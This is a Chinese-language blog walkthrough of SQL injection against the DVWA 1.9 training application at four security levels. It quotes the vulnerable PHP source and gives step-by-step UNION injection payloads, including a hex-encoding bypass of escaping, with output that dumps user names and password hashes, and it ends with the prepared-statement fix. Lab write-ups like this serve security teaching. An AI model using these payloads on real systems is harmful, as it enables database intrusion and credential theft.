首页 » NetworkSec » Penetration » 正文

dvwa1.9之SQL injection

low:

关键源码:

 $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

没有任何过滤,并且是字符型注入,但是源码一般是看不了的,所以要进行测试判断是什么类型。

(1)判断注入类型

尝试:1 or 1=1;#

返回:
ID: 1 or 1=1;#
First name: admin
Surname: admin

尝试:1′ or 1=1;#
返回:

ID: 1′ or 1=1;#
First name: admin
Surname: admin
ID: 1′ or 1=1;#
First name: Gordon
Surname: Brown
ID: 1′ or 1=1;#
First name: Hack
Surname: Me
ID: 1′ or 1=1;#
First name: Pablo
Surname: Picasso
ID: 1′ or 1=1;#
First name: Bob
Surname: Smith

字符型注入。

(2)判断列数(字段数)
尝试:1′ order by 2;#
返回:
ID: 1′ order by 2;#
First name: admin
Surname: admin

尝试:1′ order by 3;#
返回:
Unknown column ‘3’ in ‘order clause’
列数 2
(3)曝显示位
尝试:1′ union select 1,2;#
返回:
ID: 1′ union select 1,2;#
First name: admin
Surname: admin
ID: 1′ union select 1,2;#
First name: 1
Surname: 2

利用显示位查询数据库信息和当前用户:
尝试:1′ union select database(),current_user();#
返回:
ID: 1′ union select database(),current_user();#
First name: admin
Surname: admin
ID: 1′ union select database(),current_user();#
First name: nhbgtfzt_othpene
Surname: nhbgtfzt_lsa@localhost

(4)查询所有的表
由于mysql>5,所以可以利用information_schema。
尝试:1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
返回:
ID: 1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
First name: admin
Surname: admin
ID: 1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
First name: 1
Surname: guestbook,users

(5)获取users表的列(字段)
尝试:1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’;#
返回:
ID: 1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’;#
First name: admin
Surname: admin
ID: 1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’;#
First name: 1
Surname: id,username,password,user_id,first_name,last_name,user,password,avatar,last_login,failed_login

(6)爆数据
尝试:1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
返回:
ID: 1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: admin
Surname: admin
ID: 1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith
Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d

medium:

关键源码:

 $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";

加入了mysql_real_escape_string()函数对特殊符号\x00,\n,\r,\,’,”,\x1a进行转义,前端用下拉列表限制用户输入。

抓包修改即可,前端限制等于没限制。

(1)判断注入类型:

尝试:1′    or    1=1;#

返回:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’ or 1=1;#’ at line 1
尝试:1 or 1=1;#
返回:
ID: 1 or 1=1;#
First name: admin
Surname: admin
ID: 1 or 1=1;#
First name: Gordon
Surname: Brown
ID: 1 or 1=1;#
First name: Hack
Surname: Me
ID: 1 or 1=1;#
First name: Pablo
Surname: Picasso
ID: 1 or 1=1;#
First name: Bob
Surname: Smith

整形注入。

(2)查询列数(字段数)
尝试:1 order by 2;#
返回:
ID: 1 order by 2;#
First name: admin
Surname: admin
尝试:1 order by 3;#
返回:
Unknown column ‘3’ in ‘order clause’
列数 2

(3)爆显示位
尝试:1 union select 1,2;#
返回:
ID: 1 union select 1,2;#
First name: admin
Surname: admin
ID: 1 union select 1,2;#
First name: 1
Surname: 2

(4)利用显示位查询数据库和当前用户
尝试:1 union select database(),current_user();#
返回:
ID: 1 union select database(),current_user();#
First name: admin
Surname: admin

ID: 1 union select database(),current_user();#
First name: nhbgtfzt_othpene
Surname: nhbgtfzt_lsa@localhost

(5)获取表名
尝试:1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
返回:
ID: 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
First name: admin
Surname: admin
ID: 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database();#
First name: 1
Surname: guestbook,users

(6)获取列名
尝试:1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’;#
返回:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’users\’;#’ at line 1

单引号被转义了,所以把users编码为十六进制绕过

尝试:1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273;#
返回:
ID: 1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273;#
First name: admin
Surname: admin
ID: 1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273;#
First name: 1
Surname: id,username,password,user_id,first_name,last_name,user,password,avatar,last_login,failed_login

(7)爆数据
尝试:1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
返回:
ID: 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: admin
Surname: admin
ID: 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith
Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0

 

 

High:

关键源码:

 $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";

用了session,不过没什么大碍,加了limit限制了输出结果,不过注释掉和没加一样,还有查询提交页面与查询结果显示页面不是同一个,貌似也没什么妨碍,所以high和low基本一样。

直接测试爆数据:

尝试:1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#

返回:
ID: 1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: admin
Surname: admin
ID: 1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from users;#
First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith
Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d

Impossible:

源码:

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

用了token,pdo实现数据与代码分离,查询结果只有1个才输出,代码比较安全,暂时没想到注入方法。

终于写完了,真是累。

Comment